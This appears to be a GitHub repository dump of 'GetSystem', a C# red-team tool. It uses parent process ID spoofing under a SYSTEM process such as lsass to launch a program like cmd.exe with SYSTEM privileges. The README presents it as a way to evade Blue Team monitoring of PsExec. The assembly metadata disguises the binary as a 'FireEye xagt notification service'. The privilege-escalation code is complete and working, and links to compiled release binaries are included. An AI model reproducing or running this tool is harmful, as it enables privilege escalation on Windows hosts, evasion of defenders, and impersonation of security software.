├── BerlinDefence.cs
├── GetSystem.PNG
├── GetSystem.csproj
├── GetSystem.csproj.user
├── GetSystem.sln
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── README.md
├── app.config
└── bin
└── Release
├── GetSystem.exe
├── GetSystem.exe.config
└── GetSystem.pdb
/BerlinDefence.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace GetSystem
5 | {
6 | class IamYourDaddy
7 | {
8 | [DllImport("kernel32.dll")]
9 | [return: MarshalAs(UnmanagedType.Bool)]
10 | static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
11 |
12 | [DllImport("kernel32.dll", SetLastError = true)]
13 | public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);
14 |
15 | [DllImport("kernel32.dll", SetLastError = true)]
16 | public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);
17 |
18 | [DllImport("kernel32.dll", SetLastError = true)]
19 | [return: MarshalAs(UnmanagedType.Bool)]
20 | private static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
21 |
22 | [DllImport("kernel32.dll", SetLastError = true)]
23 | [return: MarshalAs(UnmanagedType.Bool)]
24 | private static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
25 |
26 | [DllImport("kernel32.dll", SetLastError = true)]
27 | static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags);
28 |
29 | [DllImport("kernel32.dll", SetLastError = true)]
30 | static extern bool CloseHandle(IntPtr hObject);
31 |
32 | [DllImport("kernel32.dll", SetLastError = true)]
33 | [return: MarshalAs(UnmanagedType.Bool)]
34 | static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);
35 |
36 | public static void Run(int parentProcessId, string binaryPath)
37 | {
38 | // STARTUPINFOEX members
39 | const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
40 |
41 | // STARTUPINFO members (dwFlags and wShowWindow)
42 | //const int STARTF_USESTDHANDLES = 0x00000100;
43 | //const int STARTF_USESHOWWINDOW = 0x00000001;
44 | //const short SW_HIDE = 0x0000;
45 |
46 | // dwCreationFlags
47 | const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
48 | const uint CREATE_NEW_CONSOLE = 0x00000010;
49 |
50 | var pInfo = new PROCESS_INFORMATION();
51 | var siEx = new STARTUPINFOEX();
52 |
53 | //siEx.StartupInfo.cb = Marshal.SizeOf(siEx);
54 | IntPtr lpValueProc = IntPtr.Zero;
55 | IntPtr hSourceProcessHandle = IntPtr.Zero;
56 | var lpSize = IntPtr.Zero;
57 |
58 | InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
59 | siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
60 | InitializeProcThreadAttributeList(siEx.lpAttributeList, 1, 0, ref lpSize);
61 |
62 | IntPtr parentHandle = OpenProcess(ProcessAccessFlags.CreateProcess | ProcessAccessFlags.DuplicateHandle, false, parentProcessId);
63 |
64 | lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
65 | Marshal.WriteIntPtr(lpValueProc, parentHandle);
66 |
67 | UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
68 |
69 | //siEx.StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
70 | //siEx.StartupInfo.wShowWindow = SW_HIDE;
71 |
72 | var ps = new SECURITY_ATTRIBUTES();
73 | var ts = new SECURITY_ATTRIBUTES();
74 | ps.nLength = Marshal.SizeOf(ps);
75 | ts.nLength = Marshal.SizeOf(ts);
76 | bool ret = CreateProcess(binaryPath, null, ref ps, ref ts, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref siEx, out pInfo);
77 | String stringPid = pInfo.dwProcessId.ToString();
78 |
79 | }
80 |
81 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
82 | struct STARTUPINFOEX
83 | {
84 | public STARTUPINFO StartupInfo;
85 | public IntPtr lpAttributeList;
86 | }
87 |
88 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
89 | struct STARTUPINFO
90 | {
91 | public Int32 cb;
92 | public string lpReserved;
93 | public string lpDesktop;
94 | public string lpTitle;
95 | public Int32 dwX;
96 | public Int32 dwY;
97 | public Int32 dwXSize;
98 | public Int32 dwYSize;
99 | public Int32 dwXCountChars;
100 | public Int32 dwYCountChars;
101 | public Int32 dwFillAttribute;
102 | public Int32 dwFlags;
103 | public Int16 wShowWindow;
104 | public Int16 cbReserved2;
105 | public IntPtr lpReserved2;
106 | public IntPtr hStdInput;
107 | public IntPtr hStdOutput;
108 | public IntPtr hStdError;
109 | }
110 |
111 | [StructLayout(LayoutKind.Sequential)]
112 | internal struct PROCESS_INFORMATION
113 | {
114 | public IntPtr hProcess;
115 | public IntPtr hThread;
116 | public int dwProcessId;
117 | public int dwThreadId;
118 | }
119 |
120 | [StructLayout(LayoutKind.Sequential)]
121 | public struct SECURITY_ATTRIBUTES
122 | {
123 | public int nLength;
124 | public IntPtr lpSecurityDescriptor;
125 | [MarshalAs(UnmanagedType.Bool)]
126 | public bool bInheritHandle;
127 | }
128 |
129 | [Flags]
130 | public enum ProcessAccessFlags : uint
131 | {
132 | All = 0x001F0FFF,
133 | Terminate = 0x00000001,
134 | CreateThread = 0x00000002,
135 | VirtualMemoryOperation = 0x00000008,
136 | VirtualMemoryRead = 0x00000010,
137 | VirtualMemoryWrite = 0x00000020,
138 | DuplicateHandle = 0x00000040,
139 | CreateProcess = 0x000000080,
140 | SetQuota = 0x00000100,
141 | SetInformation = 0x00000200,
142 | QueryInformation = 0x00000400,
143 | QueryLimitedInformation = 0x00001000,
144 | Synchronize = 0x00100000
145 | }
146 |
147 | [Flags]
148 | enum HANDLE_FLAGS : uint
149 | {
150 | None = 0,
151 | INHERIT = 1,
152 | PROTECT_FROM_CLOSE = 2
153 | }
154 | }
155 | }
156 |
--------------------------------------------------------------------------------
/GetSystem.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/py7hagoras/GetSystem/cb42e8ca23876f5eb0046e583d320dea353d9f8b/GetSystem.PNG
--------------------------------------------------------------------------------
/GetSystem.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}
8 | WinExe
9 | GetSystem
10 | GetSystem
11 | v4.0
12 | 512
13 |
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 | true
36 | bin\x86\Debug\
37 | DEBUG;TRACE
38 | full
39 | x86
40 | prompt
41 | MinimumRecommendedRules.ruleset
42 |
43 |
44 | bin\x86\Release\
45 | TRACE
46 | true
47 | pdbonly
48 | x86
49 | prompt
50 | MinimumRecommendedRules.ruleset
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/GetSystem.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\Windows\System32\cmd.exe lsass
5 |
6 |
--------------------------------------------------------------------------------
/GetSystem.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27703.2035
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GetSystem", "GetSystem.csproj", "{629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Debug|x64.ActiveCfg = Debug|Any CPU
15 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Debug|x64.Build.0 = Debug|Any CPU
16 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Release|x64.ActiveCfg = Release|Any CPU
17 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Release|x64.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {AA8E5DF5-41A2-4B82-A421-DCDD921A5D20}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 |
3 | namespace GetSystem
4 | {
5 | class Program
6 | {
7 |
8 |
9 | static void Main(string[] args)
10 | {
11 | string binaryPath = args[0];
12 | string ProcessToSpoof = args[1];
13 | int parentProcessId;
14 | Process[] explorerproc = Process.GetProcessesByName(ProcessToSpoof);
15 | parentProcessId = explorerproc[0].Id;
16 | IamYourDaddy.Run(parentProcessId, binaryPath);
17 |
18 | }
19 |
20 |
21 |
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("FireEye xagt")]
9 | [assembly: AssemblyDescription("FireEye xagt notification service")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("FireEye xagt")]
13 | [assembly: AssemblyCopyright("Copyright © 2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("629f86e6-44fe-4c9c-b043-1c9b64be6d5a")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GetSystem
2 | This is a C# implementation of making a process/executable run as NT AUTHORITY/SYSTEM. This is achieved through parent ID spoofing of almost any SYSTEM process. Helps avoid the use of PSEXEC which is closely monitored by Blue Team.
3 |
4 | # Usage:
5 |
6 | GetSystem.exe
7 |
8 | GetSystem.exe C:\Windows\System32\cmd.exe lsass
9 |
10 | 
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/bin/Release/GetSystem.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/py7hagoras/GetSystem/cb42e8ca23876f5eb0046e583d320dea353d9f8b/bin/Release/GetSystem.exe
--------------------------------------------------------------------------------
/bin/Release/GetSystem.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/bin/Release/GetSystem.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/py7hagoras/GetSystem/cb42e8ca23876f5eb0046e583d320dea353d9f8b/bin/Release/GetSystem.pdb
--------------------------------------------------------------------------------